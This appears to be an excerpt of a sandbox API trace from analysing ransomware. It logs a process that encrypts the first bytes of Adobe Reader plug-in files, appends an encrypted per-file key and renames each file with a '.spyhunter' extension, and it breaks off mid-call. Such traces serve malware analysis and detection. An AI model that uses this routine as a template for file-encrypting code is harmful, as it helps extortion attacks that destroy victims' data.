GetProcessHeap () returned 0x2c0000 [0118.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.631] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.631] WriteFile (in: hFile=0xb4, lpBuffer=0x248f934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x248f934*, lpNumberOfBytesWritten=0x248f8f4*=0x4, lpOverlapped=0x0) returned 1 [0118.633] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8f4*=0x30, lpOverlapped=0x0) returned 1 [0118.633] CloseHandle (hObject=0xb4) returned 1 [0118.634] GetProcessHeap () returned 0x2c0000 [0118.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.634] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api.spyhunter") returned 83 [0118.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api.spyhunter")) returned 1 [0118.635] GetProcessHeap () returned 0x2c0000 [0118.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.635] GetProcessHeap () returned 0x2c0000 [0118.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.635] GetProcessHeap () returned 0x2c0000 [0118.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e43808 | out: hHeap=0x2c0000) returned 1 [0118.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f938 | out: pbBuffer=0x248f938) returned 1 [0118.636] GetProcessHeap () returned 0x2c0000 [0118.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.636] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f930*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f930*=0x30) returned 1 [0118.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.636] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf") returned 96 [0118.637] StrStrW (lpFirst="Pointers.pdf", lpSrch=".txt") returned 0x0 [0118.637] GetProcessHeap () returned 0x2c0000 [0118.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.637] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0118.639] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.639] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0118.639] GetProcessHeap () returned 0x2c0000 [0118.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.639] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.639] WriteFile (in: hFile=0xb4, lpBuffer=0x248f934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x248f934*, lpNumberOfBytesWritten=0x248f8f4*=0x4, lpOverlapped=0x0) returned 1 [0118.640] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8f4*=0x30, lpOverlapped=0x0) returned 1 [0118.640] CloseHandle (hObject=0xb4) returned 1 [0118.640] GetProcessHeap () returned 0x2c0000 [0118.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.642] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf.spyhunter") returned 106 [0118.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf.spyhunter")) returned 1 [0118.643] GetProcessHeap () returned 0x2c0000 [0118.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.643] GetProcessHeap () returned 0x2c0000 [0118.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.643] GetProcessHeap () returned 0x2c0000 [0118.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48b58 | out: hHeap=0x2c0000) returned 1 [0118.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f930 | out: pbBuffer=0x248f930) returned 1 [0118.644] GetProcessHeap () returned 0x2c0000 [0118.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.645] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f928*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f928*=0x30) returned 1 [0118.645] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.646] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf") returned 93 [0118.646] StrStrW (lpFirst="Faces.pdf", lpSrch=".txt") returned 0x0 [0118.646] GetProcessHeap () returned 0x2c0000 [0118.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.646] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0118.661] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.661] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0118.661] GetProcessHeap () returned 0x2c0000 [0118.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.661] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.661] WriteFile (in: hFile=0xb4, lpBuffer=0x248f92c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x248f92c*, lpNumberOfBytesWritten=0x248f8ec*=0x4, lpOverlapped=0x0) returned 1 [0118.662] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8ec*=0x30, lpOverlapped=0x0) returned 1 [0118.662] CloseHandle (hObject=0xb4) returned 1 [0118.662] GetProcessHeap () returned 0x2c0000 [0118.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.662] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf.spyhunter") returned 103 [0118.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf.spyhunter")) returned 1 [0118.663] GetProcessHeap () returned 0x2c0000 [0118.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.663] GetProcessHeap () returned 0x2c0000 [0118.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.664] GetProcessHeap () returned 0x2c0000 [0118.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5708 | out: hHeap=0x2c0000) returned 1 [0118.664] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f930 | out: pbBuffer=0x248f930) returned 1 [0118.664] GetProcessHeap () returned 0x2c0000 [0118.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.664] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f928*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f928*=0x30) returned 1 [0118.664] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.665] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf") returned 96 [0118.665] StrStrW (lpFirst="Standard.pdf", lpSrch=".txt") returned 0x0 [0118.665] GetProcessHeap () returned 0x2c0000 [0118.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.665] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0118.670] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.670] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0118.670] GetProcessHeap () returned 0x2c0000 [0118.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.670] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.670] WriteFile (in: hFile=0xb4, lpBuffer=0x248f92c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x248f92c*, lpNumberOfBytesWritten=0x248f8ec*=0x4, lpOverlapped=0x0) returned 1 [0118.671] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8ec*=0x30, lpOverlapped=0x0) returned 1 [0118.671] CloseHandle (hObject=0xb4) returned 1 [0118.671] GetProcessHeap () returned 0x2c0000 [0118.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.672] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf.spyhunter") returned 106 [0118.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf.spyhunter")) returned 1 [0118.672] GetProcessHeap () returned 0x2c0000 [0118.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.672] GetProcessHeap () returned 0x2c0000 [0118.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.673] GetProcessHeap () returned 0x2c0000 [0118.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48928 | out: hHeap=0x2c0000) returned 1 [0118.673] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f928 | out: pbBuffer=0x248f928) returned 1 [0118.673] GetProcessHeap () returned 0x2c0000 [0118.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.673] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f920*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f920*=0x30) returned 1 [0118.673] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.673] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf") returned 96 [0118.674] StrStrW (lpFirst="SignHere.pdf", lpSrch=".txt") returned 0x0 [0118.674] GetProcessHeap () returned 0x2c0000 [0118.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.674] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0118.675] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.675] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0118.676] GetProcessHeap () returned 0x2c0000 [0118.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.676] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.676] WriteFile (in: hFile=0xb4, lpBuffer=0x248f924*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x248f924*, lpNumberOfBytesWritten=0x248f8e4*=0x4, lpOverlapped=0x0) returned 1 [0118.677] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8e4*=0x30, lpOverlapped=0x0) returned 1 [0118.677] CloseHandle (hObject=0xb4) returned 1 [0118.677] GetProcessHeap () returned 0x2c0000 [0118.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.677] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf.spyhunter") returned 106 [0118.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf.spyhunter")) returned 1 [0118.678] GetProcessHeap () returned 0x2c0000 [0118.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.678] GetProcessHeap () returned 0x2c0000 [0118.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.678] GetProcessHeap () returned 0x2c0000 [0118.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48368 | out: hHeap=0x2c0000) returned 1 [0118.678] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f928 | out: pbBuffer=0x248f928) returned 1 [0118.678] GetProcessHeap () returned 0x2c0000 [0118.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f920*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f920*=0x30) returned 1 [0118.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.679] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf") returned 96 [0118.679] StrStrW (lpFirst="Pointers.pdf", lpSrch=".txt") returned 0x0 [0118.679] GetProcessHeap () returned 0x2c0000 [0118.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.679] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0118.681] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.681] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0118.681] GetProcessHeap () returned 0x2c0000 [0118.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.682] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.682] WriteFile (in: hFile=0xb4, lpBuffer=0x248f924*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x248f924*, lpNumberOfBytesWritten=0x248f8e4*=0x4, lpOverlapped=0x0) returned 1 [0118.690] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8e4*=0x30, lpOverlapped=0x0) returned 1 [0118.690] CloseHandle (hObject=0xb4) returned 1 [0118.690] GetProcessHeap () returned 0x2c0000 [0118.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec6058 [0118.690] wnsprintfW (in: pszDest=0x2ec6058, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf.spyhunter") returned 106 [0118.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf.spyhunter")) returned 1 [0118.691] GetProcessHeap () returned 0x2c0000 [0118.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6058 | out: hHeap=0x2c0000) returned 1 [0118.691] GetProcessHeap () returned 0x2c0000 [0118.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.691] GetProcessHeap () returned 0x2c0000 [0118.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48250 | out: hHeap=0x2c0000) returned 1 [0118.691] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f920 | out: pbBuffer=0x248f920) returned 1 [0118.691] GetProcessHeap () returned 0x2c0000 [0118.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.691] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f918*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f918*=0x30) returned 1 [0118.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0118.727] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE") returned 86 [0118.727] StrStrW (lpFirst="MCIMPP.SVE", lpSrch=".txt") returned 0x0 [0118.727] GetProcessHeap () returned 0x2c0000 [0118.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.727] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8dc*=0x1e00, lpOverlapped=0x0) returned 1 [0118.754] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffe200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.754] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x248f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8dc*=0x1e00, lpOverlapped=0x0) returned 1 [0118.754] GetProcessHeap () returned 0x2c0000 [0118.754] HeapFree (in: hHeap=0x2c0000, 